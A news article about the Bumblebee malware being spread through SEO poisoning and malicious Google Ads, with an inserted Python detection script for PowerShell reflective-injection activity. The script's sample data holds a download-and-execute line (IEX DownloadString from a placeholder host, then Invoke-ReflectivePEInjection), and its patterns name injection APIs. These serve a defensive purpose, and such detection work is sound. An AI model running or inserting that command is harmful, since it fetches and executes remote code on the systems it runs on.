The Bumblebee malware, first spotted last year targeting enterprise users, is now distributed via SEO poisoning and Google Ads that promote popular software such as Zoom, Cisco AnyConnect, ChatGPT and Citrix Workspace.
A new version of the Bumblebee malware was recently discovered in the wild with a stealthier attack chain that uses the PowerSploit framework for reflective DLL injection into memory. This lets the malware load into memory without being detected by existing antivirus products, making detection and prevention more difficult.
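One way a defender can hunt for the in-memory loading step described above is to score PowerShell script block log entries (Event ID 4104, ScriptBlockText) for PowerSploit's reflective injection function and the Win32 APIs a manual PE loader needs. The code and the sample log records below are an added example written for this article, not Secureworks or Bumblebee material; the indicator names, weights and threshold are assumptions to tune against your own baseline.

```python
import re

# Constructed sample records shaped like PowerShell script block log entries
# (Event ID 4104, field ScriptBlockText). Made-up for this example, not
# telemetry from the investigation described in the article.
SAMPLE_SCRIPT_BLOCKS = [
    ("host01", "Get-ChildItem C:\\Users\\alice\\Downloads | Sort-Object LastWriteTime"),
    ("host02", "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1'); "
               "Invoke-ReflectivePEInjection -PEBytes $PEBytes -ProcId 4321"),
    ("host03", "$VirtualAlloc = Get-DelegateType @([IntPtr],[UInt32],[UInt32],[UInt32]) ([IntPtr]); "
               "$WriteProcessMemory = Get-ProcAddress kernel32.dll WriteProcessMemory"),
    ("host04", "Install-Module -Name Pester -Scope CurrentUser"),
]

# Indicator table: (name, compiled pattern, weight). The weights are an
# assumption of this example; a single strong indicator should alert on its own,
# while weaker ones only alert in combination.
INDICATORS = [
    ("powersploit_reflective_injection",
     re.compile(r"Invoke-ReflectivePEInjection", re.I), 10),
    ("in_memory_download_and_execute",
     re.compile(r"\bIEX\b.*DownloadString|Invoke-Expression.*DownloadString", re.I | re.S), 6),
    ("manual_pe_loader_api",
     re.compile(r"\b(VirtualAlloc(Ex)?|WriteProcessMemory|CreateRemoteThread|NtCreateThreadEx)\b"), 3),
    ("dynamic_win32_resolution",
     re.compile(r"Get-ProcAddress|Get-DelegateType|GetProcAddress", re.I), 3),
]

ALERT_THRESHOLD = 6  # assumed cut-off for raising a finding


def score_script_block(text):
    """Return (score, [matched indicator names]) for one ScriptBlockText value."""
    score, hits = 0, []
    for name, pattern, weight in INDICATORS:
        if pattern.search(text):
            score += weight
            hits.append(name)
    return score, hits


def find_suspicious(records, threshold=ALERT_THRESHOLD):
    """Return [(host, score, hits)] for records scoring at or above the threshold."""
    findings = []
    for host, text in records:
        score, hits = score_script_block(text)
        if score >= threshold:
            findings.append((host, score, hits))
    return findings


if __name__ == "__main__":
    for host, score, hits in find_suspicious(SAMPLE_SCRIPT_BLOCKS):
        print(f"{host}: score={score} indicators={', '.join(hits)}")
```

Script block logging must be enabled on the endpoints for these records to exist at all, so confirm that policy before relying on the query.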
“Remote workers might be looking to install new software on their home IT setup. For a quick solution they could look online, rather than go through their tech team – if they even have one. But research shows that as many as one in every 100 adverts online contains malicious content,” said Mike McLellan, director of intelligence at the Secureworks CTU.
“As people look for new tech, or want to get involved with the hype around new tech like ChatGPT, Google is the place to go to find it. Malicious ads returned in search results are incredibly hard to spot, even for someone with deep technical knowledge.”
The tools the attackers deployed in the compromised environment include the Cobalt Strike penetration-testing suite, the remote access tools AnyDesk and LadyWare, network scanning utilities, an AD database dumper and a Kerberos credential stealer.
As threat actors ramp up their use of online ads and SEO poisoning, the Secureworks team recommends that organisations protect their teams, especially remote users, and their networks by implementing restrictions and controls that limit the ability to click on Google adverts.